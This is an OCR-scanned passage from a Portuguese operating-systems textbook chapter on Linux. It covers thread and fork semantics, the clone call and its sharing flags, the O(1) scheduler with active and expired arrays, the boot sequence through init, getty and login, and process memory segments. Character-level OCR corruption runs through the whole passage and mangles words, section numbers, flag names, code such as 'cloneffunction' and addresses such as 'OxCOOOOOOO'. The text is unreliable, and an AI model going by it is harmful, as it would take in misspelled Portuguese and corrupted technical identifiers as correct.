nha que um desses threads esteja bloqueado lendo a par¬ 
tu - do ledado. 0 thread correspondente do novo processo 
tambem deve estar bloqueado lendo do tedado? Em caso 
afirmativo f qual deles obiera a próxima linha a ser digita- 
da? Em caso negativo r o que cssc mcsmo thread dcvcria 
estar fazendo no novo processo? 0 mesmo problcma sur- 
gc cm muitas outras coisas relarionadas ao quc os threads 
podcm fazer* Em um processo mono thread, nao ha cssc 
problcma, porque o urńco thread nao pode ser bloąuea- 
do ąuando cha mar fork. Agora considere a possibiiidade de 
que os outros threads nao sejam criados no processo filho. 
Suponha que um desses threads detenha um mutex que 
o thread unico do uovo processo queira adquirir após o 
fork. O mutex nunca sera li bera do c o referido thread uni¬ 
co fkara pendurado para sempre. Varios outros próbie mas 
existem alem desses. Nao ha urna soluęao simples. 

E/S de arquivos e oiura area problemaUca, Suponha 
que um thread esteja bloqueado lendo de um arqulvo e um 
outro thread feche o arquivo ou faęa um Iseek para alterar 
o ponteiro aiual do arquivo. 0 que acontecera a seguir? 
Quem sabe? 

O trata niemo de sinais ć mitra questao espinhosa. Os 
sinais devcm ser diredonados para um thread especffico ou 
para o processo em geral? Um SIGEPE (exceęao de porno 
fluiuame) deve ser capturado, provavelmente, pelo thread 
que o causou. O que ocorre se dc nao o capturar? Somcntc 
esse thread deve ser mono ou todos os threads devem se¬ 
to? Considere o sinal SIGINT, gerado pelo usuario via 
teclado. Qual thread deve fi car com esse sinal? Todos os 
threads devcm compartilłmr o mesmo conjunto dc mas- 
caras de sinais? Todas as soluęoes para esses e outros pro- 
blemas geralmente causam complicaęoes em algum lugar. 
Dcscobrir a semantica correta dos threads (sem falar no có- 
digo) nao e unia tarefa trivial. 


O Linux da suporte a threads no nudeo de um modo 
interessante, que vale a pena observar. A implementaęao 
e baseada nas ideias do 4.4BSD, apesar de os threads no 
nudeo nao terem sido habilitados naquela versao porquc 
Berkeley ficou sem dinheiro antes quc a bibliotcca C pu- 
desse ser rccscrita para rcso!vcr os próbie mas discutidos 
anteriormente* 

Historicamente, os processos eram recipientes de re- 
cursos e threads eram as imidades de execuqao. Um pro¬ 
cesso continha um ou mais threads que compartillwam 
espaęo de endereęamento, arquivos abertos, gerendadores 
dc sinais, alarmes e tudo mais. Tudo era simplcs e claro 
como acabamos dc descrcvcr. 

Em 2000, o Liniix introduziu urna nova e poderosa 
cha mada de sisiema, done, que tornou diffcil a distinęao 
entre processos e threads e possivelmente iiwerteu a su¬ 
prema cia dos dois conceitos. A chamada clone nao esta pre- 
seme em nenhuma outra versao do UjNJX. Classicamente, 
quando um novo thread era criado, os threads originais 
e o novo compartilhavam tudo, exceto os registros. Em 
particułar, os descritores para abcriura de arquivos, geren- 
dadores de sinais, alarmes e outras propriedades globais 
pertenriam somente a um processo, e nao a um thread. O 
que a chamada clone fez foi viabilizar que cada um desses 
aspectos estivessem rei a cio na dos a um processo o u thread 
especfficos. Ela e chamada como segue: 

pid = cloneffunction, stack_ptr, sharing Jtags, arg); 

A chamada cria um novo thread, ou no processo alualou 
cm u m n-ovo processo, dependendo clo para metro sharing_ 
flags* Se o novo thread esia no processo aiual, dc compar- 
li]ha o espaęo de endereęamento com os threads existentes 
c Loda escrita subsequente a qualqucr byte no espaęo de 
endereęamento por qualquer thread e imediatamente visf- 
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vel a lodos os deinais threads no processo. Por omro lado, 
se o espaęo de endereęamento nao e compart i Iliado, entao 
o novo thread obtem u ma capia exata do espaęo de ende¬ 
reęamento, mas as escritas subsequentes pclo novo thrcad 
nao sao visiveis a os antigos threads. Essas semanticassao as 
mesmas de fork do PO$fX. 

Em ambos os casos, o novo thrcad comeęa a cxecuęao 
cm function, ąuc ć cha ma da com ar$ sen do sen mii co pa¬ 
ra metro. Tambcni aqui, cm ambos os casos, o novo thrcad 
obtem sua própria pilha privada, com o ponteiro da pilha 
inicialteado com smek _j?£r. 

O | jara metro $harin$_]hp e urn mapa dc bits quc perm i- 
te urna grami laridade muito mais lina de com partii ha men to 
do que os sistemas UN1X t radicionais. Gada nm dos bits pode 
ser configurado de maneira independent? dosomros, e cada 
um deles determina se o novo thread copia alguma estru- 
tura dc dados o u a compartilha com o thrcad chamador* A 
Tabela 10.4 apresenta alguns dos itens que podem ser com- 
pariilhadós o u copia dos segundo os bits cm $ham0_fla$s. 

O bit CLONE_VM determina se a memória virmal (isto 
e, o espaęo de endereęamento) sera copiada on compar¬ 
tilha da com os threads antigos, Se o bit e marca do, o 
novo thrcad simplesmcnte e inscrido com os dc mais exis- 
tentes, de modo quc a cha mada efetivamente cria mu 
novo thrcad cm um processo existente. Sc o bit ć limpo, 
o novo thread obtem seu próprio espaęo de cntlcreęa- 
mento. Ter seu próprio espaęo de endereęamento significa 
que o efeito de suas instruęoes STORĘ nao e visfvd aos 
threads existemes. Essc comportamcnto ć similar cm fork, 
exceto pelos aspectos observados a seguir. A criaęao de 
um novo espaęo de endereęamento e efetivameme a ddi- 
nięao dc um novo processo. 

O bit CLONE_FS controla o compartilhamenio dos di¬ 
retórios-raiz, de trabalho e do Hag umask. Mesmo que o 
novo thread teolia seu próprio espaęo de endereęamento, 
se csse bit cstiver marcado, os threads antigos e o novo 
poderao compartijhar os di retor i os de trabalho. isso signi¬ 
fica quc u ma cha mada a chdir feita por um thrcad altcra o 
diretório dc trabalho do outro thread, mesnio que este le- 
nha sen próprio espaęo de endereęamento. NoUNlX, unia 


cha mada a chdir por um thread sempre altcra o diretório de 
trabalho para outros threads do mesnio processo, mas mtn- 
ca para os threads dc outro processo. Assim, o bit habilita 
um tipo de compartilhamento impossivcl no UNiX, 

O bit CLONEJFILES e analogo ao bil CLONEJ®. Se 
marcado, o novo thread pode compartilhar seus próprios 
descritorcs dc arquivos com os threads antigos, permitin- 
do, assim, que as cha mada s a iseek, feitas por um thread, 
sejam visfveis a outros threads, novamenie como dentro 
do mesino processo, mas nao para os threads de processos 
diferentes. Da niesma maneira, CLONE_SlGHAND habilita 
ou desabilita o compartilhamento da tabela do tratador de 
sinais entre o thread antigo c o novo. Se a tabela for com- 
partilhada, mesmo entre threads dc diferentes cspaęos dc 
endereęamento, urna alteraęao do tratador feita por um 
thrcad afetara os tratadores dos outros threads. Por firn, 
CLONE_PID controla se o novo thread tera seu próprio PID 
ou compart i i ha ra o PID dc seu pa i. Essa caracteristica e nc- 
cessaria d u ranie a inidaUzaęao do sistenia. Os processos 
dos usuarios nao possuem permissao para habilita-la. 

Por Om, todo processo tern u m pa i. O bit CLONE_PA- 
RENT controla qucm e o pal do novo tlircad. Ele pode ser 
o mesmo do thrcad chamador (e af o novo thread e irmao 
do chamador) ou pode ser o próprio thrcad chamador, si- 
tuaęao na qual o novo thread e filbo do chamador. Esristem 
alguns outros bits que eon troi a m outros itens, mas sao me- 
nos importantes* 

Esse compartilhamento de grami la ri da de lina e possi- 
veł porque o Linux mantem estruturas de dados separadas 
para os varios itens reladonados no inicio da Scęao 1033 
(parametros de escalonamento, imagem da memória etc)* 
A esmitura de tarefas simplesmcnte aponta para essas 
estruturas de dados c r portanto, c faril criar u ma nova es¬ 
tru tura de tarefas para cada thrcad clonado e fazer com 
que essa entrada apome ou para as estruturas de escalo- 
namento, de memória c de outros dados ou para as cópias 
delas. O lato dc csse compartilhamento dc gramilaridade 
Tina ser possiYcl nao significa que dc seja usado, cspecial- 
meme porque o UM1X nao oferece essa fundonalidade. Um 
prógrama Linux quc lira vantagem dessa caracteristica mio 
pode mais ser lcvado para um ststema UNIX. 


Flag 

Significado quando marcado 

Significado quando limpo 

CLONE VM 

Cria um novo thread 

Cria um novo processo 

CLONE.FS 

Compartilha umask e os diretórios-raiz e de 
trabalho 

Nao compartilha umask e os diretórios-raiz e 
de trabalho 

CLONE.FILES 

Compartilha os desentores de arquivos 

Copia os descritones de arquivo$ 

GLON E SIGH AIMD 

Compartilha a tabela do tratador de sinais 

Copia a tabela do tratador de sinais 

CLONE^PID 

0 novo thread oblem o PID antigo 

0 novo thread obtśm seu próprio PID 

CLONE.PARENT 

0 novo thread tern o mesmo par que o chamador 

0 chamador e o pa] do novo thread 


i Tabela 10.4 Bits no mapa de biis sbaring_ flags. 
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O modelo cle threads do Linux cria uma outra dificuł- 
dade. Os sistemas UNIX associam um unico PID ao pro- 
cesso, independente menie de dc possuir someme um on 
multiplos threads. Para ser compatfvel com outros sistemas 
UN1X, o Linux fazdistinęao entrc o idcntificador de proces- 
so (PID) e o dc tarefa (TID). Ambos os eampos estao arma- 
zenados na estru tu ta dc tarefas. Quando done c usada para 
triar um novo processo que nao eompartilha nada com seu 
criador, o PiD recebe um novo valor; caso conirario, a ta¬ 
refa ręcebe um novo TID, mas herda o PID. Dessa forma, 
todos os threads em um processo re cc bera o o mesmo PID 
como o primciro thread no processo. 

10.3.41 Escalonamento no Linux 

Vamos agora ver o algoriimo de escalonamento do Li- 
nux Para comcęar, os threads do Linux sao threads do nu- 
deo, dc modo que o cscalonameruo e bascado cm threads, c 
nao em processos. O Linux disiinguc tres dasses de threads 
para ąuestóesde escalonamento: 

1. FIFO em tempo real. 

2. Chaveamento circular em tempo reał. 

3. Tempo compartilhado. 

Os threads do lipo FIFO em tempo rcal sao os dc maiot 
priori dadc c nao sof rem prccmpęao, cxccto por um thread 
FIFO em tempo real que lenha acabado de Ikar pronto 
para execuiar+ Os threads do tipo escalonamento drcular 
ein tempo real sao os mesmos threads FIFO em tempo real, 
exceto por estes serem preempthos e associados a unida- 
des (quanto) de tempo de execuęao. Se multiplos threads 
do lipo chaveamento circular em tempo real estao promes, 
cada um pode ser executado durante sen ąuantum, após 
o qual segue para o finał da lista de threads do tipo drcu¬ 
lar cm tempo rcal. Nenhuma dessas dasses rcalmcntc e dc 
tempo rcal em sentido mais amplo. Ncnhum prazo para 
execuęao pode ser estabdccido c nao ha ąualąuer garantia, 
Essas dasses sao simplesmente mais prioritarias do quc a 
classc dc tempo eompartilha do padrao. O Lmux usa essa 
mmiendatura porque segue as especificaędes do padrao 
P 1003.4 (extensóes de Tempo real' para UNIX), que usa 
esses no mes. Os threads em tempo real sao interna me me 
represemados por mveis de prioridade que variam de 0 a 
99, sendo 0 o mvel mais alto e 99 o mvel mais baixo de 
prioridade em tempo real. 

Os threads coovencionais, que nao sao em tempo real 
sao escalonados segundo o algoritmo a seguir. Imemamert- 
te, esses threads estao associados a mveis de prioridade que 
variam de i 00 a 139, ou seja, o Lintix disiinguc interna- 
nieme entre 140 nfveis de prioridade (para tarefas em tem¬ 
po real ou nao). Assim como nos threads em clweamento 
circular em tempo real, o Linux associa valores dc tempo 
do ąuantuni para cada um dos nweis dc prioridade quc nao 
sao tempo real O quantum rcfcrc-se ao mi mero dc riclos 
do rclógio quc o thread pode cominuar cm cxccuqao. Na 


versao atual do Linux, o relógio funciona a 1.000 Hz e cada 
ciclo leva 1 ms, ao que chamamos de instante (jiffy). 

Como na maioria dos sistemas UNIX, o Unux associa 
um valor, denominado niee, a cada thread. O padrao e 0, 
mas de pode ser modifteado por nido da cli a mada de sis- 
tema nice(valor), em que o para metro 'vaior' varia de -20 
a +19. Esse valor determina a prioridade esiatica de cada 
thread. Um usuario que esteja calculanso ty com a preci- 
sao de i bilhao de casas decimais em segundo piano pode 
incluir essa cha mada em sen programa para ser simpatico 
com outros usuarios. Somcnte o admimstrador do sistema 
pode solicitar scrvięos melhores do quc o nor mai (com valor 
variando dc-20a-l). Deixamoscomo cxcrciciopara o lei- 
tor a deduęao da razao para essa rcstrięao. 

Uma estrtitura de dados essencial utilizada pelo esca- 
lonador do Linux e a fila de execuęao (runąueue). Existe 
uma fila de execuęao associa da a cada CPU no sistema e, 
entre o u tras informaęoes, da mantem dois vetores — ativo 
c expirado< Confornie mostrado na Figura 10.6, cada um 
desses eampos e um pontetra para um vetor de 140 cabe- 
ęalhos dc listas, cada um correspondendo a uma prioridade 
diferente. O cabeęalho da lista aponla para uma lista dc 
processos duplamente encadeada com uma dada priorida¬ 
de. A tarefa basica do escalonador e desenia a seguir. 

O escalonador seledona uma tarefa de mais nlta priori- 
dade no vetor ativo. Sc o quantum dessa tarefa expirar, da e 
movida para uma lista de tarefas expiradas (potencialmente 
cm um mvd de prioridade diferente). Se a tarefa ficar blo- 
queada — esperando por um evento de E/S, porexemplo — 
antes que sita parcela de tempo expire, assim que o evento 
ocorre e sua execuęao pode ser retomada, da e colocada de 
volta no vetor ativo e seu tempo e decrementado de forma a 
reflctir o tempo de CPU ja consumido. Quando sna parcela 
dc tempo estiver termin a da, ela tambem sera colocada no 
vetor cxpirado. Quando nao cxistirem mais tarefas cm ne- 
nhum dos vctores ativos r o escalonador siniplesmente varre 
os pontciros para que os vctorcs expirados se tomem os vc- 
tores ativos e vicc-versa. Esse metodo gara n te que as tarefas 
dc baixa prioridade nao cm rem cm inanięao (exccto ąuando 
ós threads FIFO de tempo rcal tomem totalmcnte a CPU — o 
que e pouco provacel), 

NiVeis dc prioridade diferentes reccbem fatias dc tempo 
diferentes, O Linux atribtu valores de quantum mais altos 
aos processos de mais alta prioridade. Por cxemplo, as tare¬ 
fas exccutadas com mvel 100 de prioridade receberao um 
ąuantuni dc 800 ms, enąuanto as tarefas cxccuiadas com 
ntvcl 139 dc prioi idadc receberao um ąuantuni de 5 ms. 

A ideia por tras desse esquema e tirar os processos do 
modo nucleo o mais rapido possfveI. Se um processo estiver 
tentando ler um arquivo cm disco, fazedo esperar um se- 
gundo entre as chamadas read o deixara consideravelmente 
mais lento. E muito melhor deixar quc cle cxccute logo após 
a condusao dc cada solicitaęao, para quc cle possa cxecu- 
lar a seguime mais rapidamente. De mancira se md hanie, 
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Ra da execuęao por CPU 
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K Figura 10.6 llustraęao da fila de execuęao e dos vetores de prioridade no Linux. 


se um processo foi bloąueado aguardando Lima entrada via 
teclado, ele e obviamente om procesjo interaiivo e, como 
lab deve receber prioridade aha assim que cstiver pronto, 
dc forma a garamir que os proccssos imerativos obtenham 
bons scr\'i^os. Sob essa ótica, os proccssos dcpcndcntes da 
CPU obtem basicamentc qualqircr scrvięo livrc quando os 
proccssos i literat ivos dcpcndcntes dc E/S estao bloąucados* 

Como o Linux (ou qualquer outro sistema operacio- 
nal) nao sabe dc amemao se urna tarefa depende da CPU 
ou de E/S, de confia na manutenęao continua de hcunsticas 
de imcratividade. Dcssa maneira, o Linux faz distinęao en- 
irc as prioridades cstalica c dinamica. A prioridade dinami- 
ca dos threads ć contimiamcnte rccakiilada, dc forma quc 
(1} recompcnsa os threads inlerativos c (2) punc os threads 
quc controlam a CPU. O bonus maximo de prioridade e -5, 
pois os mveis mais baixos dc prioridade correspondem a 
alias prioridades recebidas pelo escalonador. A penalidade 
maxima de prioridade e +5. 

Mais espedficamcmc, o escalonador mantem urna va- 
riavel skep_av$ associada a cada tarefa. Sempre quc urna 
tarefa e acordada, cssa variavd e inerememada; sempre 
quc urna tarefa e preempiada ou seu ąuantum expira, a 
variavd e deerementada pelo valor correspondente. Esse 
valor e utilizado para mapę ar dinamicamente o bonus da 
tarefa para valores entre -5 e +5. O escalonador do Unux 
recalcula o novo mvel de prioridade quando um thread e 
movido da lista de ativos para a de cxpirados. 

O algoritmo de escalonamcnto descrito nesta seęao re- 
fere-se ao nudeo 2,6 e foi introduzido pela primdra ve?. no 
nudeo 23 instaveb Os algoritmos anteriores apresemavam 
um baixo desempenho em configuraęóes multiprocessador 
e nao escalonavam bem urn numero crescente de tarefas. 


Como a descrięao apresentada nos paragrafom anteriores 
indica que Lima decisao de escalonamcnto pode ser tornada 
com base em urna lista apropriada de ativos, ela pode ter 
tempo constantc 0(1), independentemente do numero dc 
proccssos no sistema. 

Alem disso, o escalonador inclui recursos particular- 
mente uteis em plataformas muliinudeo ou com multi- 
plos processadores. Primeiro, nas plataformas com mul- 
tiplos processadores, a estru tura de fila de execuęao esta 
associada a cada CPU. O escalonador ten ta manier os benc- 
ffcios por meio do escalonamemo por afinidade, tentando 
cscalonar na CPU tarefas anteriormcme cni exccuęao. Sc- 
gundo, um conjunto dc riiamadasdc sistema esta dispom- 
vcl para espedficoęóesou modifkaęoes futuras nos rcąuisi- 
los dc afinidade de um dcierminado thread, Finalmemc, o 
escalonador executa um balanceaniemo periódico dc carga 
entre as filas de execuęao de diferemes CPUs para garamir 
que a carga do sistema esteja bem balanceada, enquanto 
ainda cumpre com determinados requisitos de desempe¬ 
nho ou afinidade. 

O escalonador considera somente as tarefas executa- 
veis, que sao colocadas nas filas de execuęao apropriadas. 
As tarefas que nao forem executaveis e estiverem aguar- 
dando por diversas operaęoes de E/S ou por outros eventos 
do nudeo sao colocadas em outra estru tura de dados, a fila 
deespera {waitąueue). Existe urna fila dc espera associada 
a cada evcnto pelo qual urna tarefa pode esperar. O eabc- 
ęalho da fila de espera inclui um pomeiro para urna lista 
encadeada de tarefas e um spinlock. Este e necessario para 
garamir que a fila de espera possa ser concorrentememe 
manipulada pelo código principal do nucleo e tratadores de 
interrupęao ou o u tras invocaę5cs assineronas. 
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Na verdade, o código do nucleo rantem variaveis de 
sincronizaęao em diversos locais. Os nudeos anteriores 
do Linux tinliam somente urna grandę trava do nucleo 
{biij kertui lock — BKL) ą ue acabou se mostrando altamen- 
te inefidente, em especial nas plataformas com multiplos 
processadores, pois impedia quc proccssos cm difcrcntcs 
CPUs cxccutasscm código do kernel dc forma concorrcnlc. 
Assim scndo, d1versos novos pontos de sincronizaęao fo- 
ram imroduzidos eona u ma granularidade muilo mais alta, 

10-5,51 Inicializando o Linux 

Os detalhes variam dc piatalorma para platafomia, 
mas, cm geral, os passos dcscritos a seguir representam o 
processo dc boot. Quando o computador c ligado, o BIOS 
executa urn auioieste denominado Post {Power-On-Self-Test} 
e dctccia c inicializa os dispositivos — ja que o processo 
dc boot do sisiema operacional pode depender dc acessos 
a dis cos, inonitores, icclados etc. Em seguida, o primeiro 
scior do disco dc boot (registro-mestre de boot — master 
boot record — MBR) e lido para a memória c execuiado. 
Esse setor contein urn programa pcąucno (512 bytes) quc 
carrega outro programa independente, chamado boot, do 
dispositivo dc boot, gcralmcntc urn disco IDE on SCSI, O 
programa boot primeiro copia a si próprio para urn endere- 
ęo predefinido da memória alta, liberando memória baixa 
pa ra o sis tern a o pera don a I, 

Oma vez movido, o boot le o diretório-raiz do disposi- 
tivo de boot. Para isso, cle deve conhcccr o sisiema de ar- 
qmvo$ e o formaio do diretório, que ć o caso dc alguns car- 
regadores dc boot como o GRUB ( Grand Unifier Bootload- 
er — grandę unifkador de carregadores de boot), Ou- 
tros carregadores po pulares, como o LILO da Intel na o 
confiam cm nenhum sistema de arquivos especifico, Em 
vez disso, des pretisam dc um mapa dc blocos c endereęos 
dc baixo nivel quc dcscrcvcm os setores ffsfcos, para en* 
contrar os sciorcs que devem ser carrcgados. 

O boot, en la o, Ic o nudeo no sistema opcracional e 
transfere o eontrole para dc, Nesse momento, o boot fina- 
lizou scu trabalho e o nucleo esia em cxecuęao, 

O código dc disparo {start~up) do mideo c cscrito cm 
linguagem asscmbly e c altamentc dependente de maqui- 
li a. Como trabalhos tfpicos es ta o inchudos os ajustes na 
pilha do nucleo, a identificaęao do lipo da CPU, o calculo 
da quantidade de RAM preseme, a desa bil ilaęao da inter- 
rupęao, a habilitaęao da MM u e, por firn, a cha mada da ro- 
tina mam em linguagem C para inidalizar a parte principal 
do sistema operarional. 

O código C tambem tem dc fazer urna inidalizaęao 
considcravd, mas, nesse caso, mais lógica do que Esica. Ele 
inicializa alocando um buffer de mensagem para auxiliar 
a depurar os problemas do boot Enąuanto a inicializaęao 
prossegue, mensagens sao eseritas sobre o que esta aton¬ 
ie cend o, de modo que elas podem ser analisadas — caso 
o processo de boot venba a ialhar — por um programa de 


diagnóstico espedal. Pense nisso como um gravador de 
bordo do sistema operacional (a caixa-preta que e irwesti- 
gada para se saberem as causas da falha de avioes). 

Em seguida, as estruturas de dados do nucleo sao alo- 
cadas, A maioria e de tamanlio lixo, mas algumas — como 
a ca che tle blocos e cert as estruturas assodadas a tabela de 
paginas — dependem da quantidade de RAM disponfrel. 

Nesse porno, o sistema comcęa a autoconfiguraęao, 
Usando arquivos de configuraęao que informam ąuais ti- 
pos de dispositivos de E/S estao presem es, ele comeęa a 
examinar os disposiiivos para ver quais realmente estao 
presentes. Se um disposilivo examinado falha ao respon- 
der, o sistema presume que dc esta ausentc c o ignora dali 
em diantc, Ao conirario das versóes tradicionais do UNIX, 
os drivcTs dc dispositivo do Linux nao precisam estar esla- 
ticamcnte ligados c pod cm ser carrcgados dinamicamcnte 
(como podem todas as versóes do MS-DOS e do Windows). 

Os a rg u mcm os favoraveis o u contra rios a o carrega- 
men to di uamico dos drivers sao interessanics e va!e a pena 
explica-los rapidameme, 0 argumento prindpal para o car- 
regamento dinamico c quc somente um binario precisa ser 
entregue aos consumidorcs, com configuraęocs difcrcntcs, 
dc modo que ele próprio carrcgue auiomaticameme os dri- 
vers necessarios de acordo com ca da configuraęao, mes- 
mo sobre uma rede. O argumento principal contrario ao 
carrega men to dinamico e a seguranęa, Se voce esta exectt- 
tando um programa seguro, como o servidor do banco de 
dados de um banco ou o servidor da Web de urna empresa, 
voce provavelmcnte nao vai quercr que algucm insira um 
código aleatório dentro do nucleo. 0 administrador do siste¬ 
ma pode manier os códigos c os arquivos-objcto do sistema 
operacional em urna maquina segura, construir todas as 
instandaś do sistema nessa mesma maquina e entregar o 
binario do mideo para as demais maquinas de uma rede 
local. Se os drirers nao podem ser carregados dinamica¬ 
mcnte, esse procedimento impede que os operadores de 
ma qui nas c outros quc conheęam a sen ha do supcrusuario 
insiram algum código prejudiciai ou cheio de erros no nu- 
eko, Al cm disso, cm grandes ambieutes computacionais, 
a configuraęao do hardware c coiihecida exatamentc no 
momento em que o sistema e compilado e ligado, Quais- 
quer altcraęocs sao raras o bastantc para que rcatizar a rc- 
com pil a ęa o do sistema sempre que um novo dispositivo de 
hardware seja adieionado nao seja um grandę problema. 

Dcpois quc todo o hardware fol configu rado, o passo 
seguimc e alocar ciitdadosamente o processo 0, ajustar sua 
pilha e executa-lo. O processo 0 continua a inicializaęao, 
fazendo coisas como a programaęao do relógio de tempo 
real, a montagem do sistema de arquivos-raiz e a criaęao 
do init (processo i) e do daernon de paginaęao (processo 2). 

O init verifica sens bits dc informaęao ijkujs) para saber 
se a exccuęao e mono ou inultiusuario. No primeiro caso, 
ele cria um processo que execma o sltell e espera pelo len 
mino desse processo. No segundo caso, ele cria um processo 






Sn*W66G 


466 Sistemas operacionais modern os 


para executar um script de shell de inidalizaęao do siste- 
ma, fetcJrc, que pode verifkar a consistencia do sistenia de 
arquivos, montar sistemas de arqulvos adicionais, disparar 
processos daemon e assim por dianie. Depois, de le o ar- 
quivo ktcłttys, que re la ci o na os termin ais e algumas dc su as 
propriedades. Para cada terminal hahilitado, cle cria urna 
cópia dc si próprio, a qual faz alguma linipcza c mami ten- 
ęao, e posteriomente executa um próg rama chamado^efty. 

O gtity aj usta a veloddade da linha e outras proprieda- 
des para cada linha (algumas das quais podem ser modems, 
por exemplo) e r entao, mostra 

login: 

na lela do terminal e tema lero nome do usuario □ partii do 
teclado, Quando pega um terminal c lornece sen nome 
de usuario, getty finaliza executando fbmflogm, que e o pro- 
grama de entrada no sistema. Login entao pede urna senha, 
cod i fi ca-a e compara-a com a senha codificada existente no 
arquivo dc senhas, o fetc/passwd. Sc a senha esta eorreta, 
login śLibstitui a si próprio pdo shell do usuario, que espera 
pelo primetro comando. Sc a senha estivcr incorreta, login 
simplcsmenle pede outra ao usuario. Esse mccanismo e ilus- 
trado na Figura 10,7 para um sistema com li es lerminais. 

Na figura, o processo gettyąue esta execiitando no ter¬ 
minal 0 ainda esta espera u do alguma entrada. No terminal 
I, um usuario ja enlrou com o nonie de usuario e getty fol, 
assim, substitmdo por login, qtie esta pedindo urna senha. 
Urna entrada bem-sucedida no sistema ocorreu no termi¬ 
nal 2, no qual o shell mostron o prompt (%). O usuario 
entao digitou o comando 

cp fi f2 

qne faz o sheli criar um processo fil ho para executar o pro- 
grama cp. O shell e bloąueado e vai esperar pelo termino do 


Fil ho, momento no qual ele novamente mostrara um novo 
prompt e lera as entradas do teclado. Se o usuario no termi¬ 
nal 2 digitasse cc em vez de cp, o programa principal do com- 
pilador C seria inicializado e, com isso, seriam criados mais 
processos para executar os varios passos do compilaęao. 


10.4 


Gerenciamento de memória 
no Linux 


O modelo de memória do Linii x e di re to e objetivo, de 
modo que permila a portabilidade dos programas e possibi- 
iite a implememaęao do ljnux em maąuinas com unidades 
de gerenciamento de memória mu i to diferentes, desek as 
mais simples (por exemplo, o IBM PC origiual) ale aąuelas 
com hardware de paginaęao solisticado. Essa e urna area 
do projeto pouco alterada durante decadas—como fundo- 
non hem, nao precisou de muita revisao. Agora examina- 
remos o modelo e como ele e implementado. 


10.4.11 Conceitos fundamentais 

Todo processo no Linux tein um espaęo de endereęa- 
mento que consiste dc tres segmentos: código, dado e pi- 
Iha. O cspaęo de endcreęamento dc um processo A c mas- 
trado na Figura LO.S(a). O segmento de código contćm 
as instruęoes dc iiiaquina que formam o código executavd 
do programa, Ele e p rod uzi do pdo compilador e monlador 
por meio da iraduęao de C C++ ou ouiros pr ogra mas em 
código de maqihna, o segmento de código e, em geral 
marcado como someme leitura. A modificaęao do código 
pelo próprio programa safram de modo em toni o de 1950 
porque ficava muito diffcii de compreender e depurar. As¬ 
sim, o segmento de código nao cresce, nao diminui nem se 
altera de nenhuma mancira. 



1 Fig u ra 10.7 A seguóncia de p rocessos utiiizad a na i nicializaęao d e alg u ns sistem as Li nu*. 
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Figura 10,8 {a) Espaęo de endereęameeto virtua! do processo A. (b) Memória lisica. (c) Espaęo de endej-eęamento virtuai do 
I processo B. 


O segmento de dados e o local de armazenamemo 
de todas as vanaveis do programa, das cadeias de ca rac- 
leres, dos vetores e de outros dados. Ele lem duas partes; 
os dados inidalizados e os dados nao inidalizados. Por 
razocs históricas, o segundo e conhecido como BSS (his- 
toricamenie denominado Błock Started by Symbol). A parte 
inidalizada do scgmcmo de dados contćm as vanaveis c 
as constames que necessitam de um valor inidai quando o 
programa e intciado. Todas as variaveis no BBS sao tniciali- 
zadas com zero após o ca rrega me ni o. 

Por exenipio, cm C e possfvel dcdarar urna cadcia de 
caractcres e inkializa-la no mesmo comando. Quando o 
programa inicia, cle e spęta que a cadeia tcnha sens valorcs 
iniciais. Para implemeniar essa construęao, o compilador 
associa a cadda uma posięao no cspaęo de endercęamemo 
e garante que r quando o programa e iniriado, essa localiza- 
ęao contenha a cadda correta. Do porno de vista do sistema 
operational, os dados inidalizados nao sao tao diferentes 
do código do programa — a mb os contem pa dr oes bi nanos 
produzidos pdo compilador qne deyem ser ca rrega dos na 
memória quando o programa inidalizar. 

A existencia de dados nao inidalizados e, na verdade, 
apenas uma questcio dc otimizaęao. Quando unia variavel 
global nao c cxpJidtameme inidalizada, a scmantica da lin- 
guagcm C e men de que seu valor inicial ć 0. Na pralka, mui- 
tas variaveis giobais nao sao inicializadas explidtatneme e, 
coni isso, das valem 0* Isso pode serimplcmentado com uma 
seęao do arquivo binario execuiavd contendo exatamente 
o mi mero de bytes de dados, em que to dos sao inidaliza¬ 
dos, indmndo agueles com o valor padrao definido como 0. 

No en tanio, para economizar cspaęo no arquivo exe- 
cuiavcL isso nao ć feito. Em vez desta, o arquivo contem 
todas as variaveis inicializadas explidtamente na sequenria 
do código do programa. As variaveis nao inicializadas sao 
agrupadas todas juntas após as inicializadas, de modo que 


tudo o que o compilador deve fazer e colocar uma palavra 
no cabeęalho do arquivo informando quantos bytes alocar. 

Para que esse esquema se torne mais daro, observe a 
Figura 10*8(3) noyamente* Nela o código do programa tern 
S KB e os dados inidalizados tambem sao 3 KB. Os da¬ 
dos nao inidalizados (BSS) sao 4 KB. O arquivo exccutavel 
tern semenie 16 KB (código + dados uudalizados), mais 
um pcqueno cabeęalho quc pede ao sistema opcradonal 
para alocar 4 KB no fi na] dos dados inidalizados e atnbuir 
0 a clcs, antes dc inicializar o programa. Esse truque cvita 
arniazenar 4 KB de zeros no arąuiyo exccutavcL 

Para evitar a alocaęao de uma estrutura de pagina ff- 
sica repleta de zeros, durante a inidaHzaęao o Liniix aloca 
uma pagina zero estatica, que e uma pagina protegida cheia 
de zeros. Quando um processo e carregado, sua regiao de 
dados nao inicializada e configurada para apontar para a 
pagina zero. Sempre que um processo terna rescrever nessa 
area r o mecanismo de copiar-se-escrita e ativado e uma es¬ 
tru tura de pagina real e alocada ao processo* 

Diferentemente do segmento de código, que nao pode 
ser altcrado, o segmento de dados lem essa propriedade. Os 
programas modifkam os yalores de suas variavds durame 
todo o tempo. Alem disso, du ranie a exccuęao, mu i los pro¬ 
gramas precisam alocar espaęo dinamicamente. O Linux 
resoive essa questao permilindo que o segmento de dados 
cresęa e dimimia a medida que a memória e alocada ou 
liberada, Uma cha mada de sistema, brk e disponibUizada 
para per mi lir que os programas ajuslem o tamanho de seu 
segmento de dados, Assirn, para alocar mais memória, um 
programa pode aumentar o tamanho de sen segmento de 
dados* A rodna de biblioteca escrita em c, cha mada malloc, 
normalnienie usada para alocar memória, emprega inten- 
sa menie essa cha mada de sistema. O descritor de espaęo 
de endereęamento do processo contem informaęóes sobre 
o escopo da area de memória dinamicamente alocada no 
processo, normalmente denominada monte. 
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O terceiro segmento e o de pilha. Na maioria das rna- 
quinas, ele inicia no lopo do espaęo de endereęamento 
virtual — ou próximo dele — e cresce para baixo, em di- 
reęao ao endereęo 0. Em plataformas x86 de 32 biis, por 
excmplo, a pilha conieęa no endereęo OxCOOOOOOO r quc 
ć o limite dc endereęamento virtual dc 3 GB visivcl para o 
proeesso no modo usuario, Se a pilha cresce aierti da base 
do segment o de pilha, urna interrupęao ocorre e o sistema 
opracional atualiza a posięao da base em u ma pagina mais 
abaixo. Os programas nao gereneiam explicitamenie o ta~ 
